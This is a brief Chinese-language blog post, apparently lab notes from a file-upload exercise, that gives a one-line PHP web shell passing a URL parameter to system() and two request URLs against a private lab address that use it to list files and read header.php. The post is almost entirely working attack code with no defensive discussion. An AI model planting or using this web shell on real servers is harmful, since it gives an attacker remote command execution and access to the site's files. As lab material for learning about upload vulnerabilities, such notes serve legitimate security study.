Ex1:

上傳一個 .php的文件

<?php
System($_GET[“cmd”]);
?>
檢測字串:
http://192.168.83.132/upload/example1.php? ?page=list_images.php&cmd=ls%20-lah

Ex2:

檢測字串:

http://192.168.83.132/upload/example1.php?page=list_images.php&cmd=cat%20header.php

創作者介紹
創作者 nini的部落格 的頭像
布拉怡

nini的部落格

布拉怡 發表在 痞客邦 留言(0) 人氣( 32 )

▲top

請先 登入 以發表留言。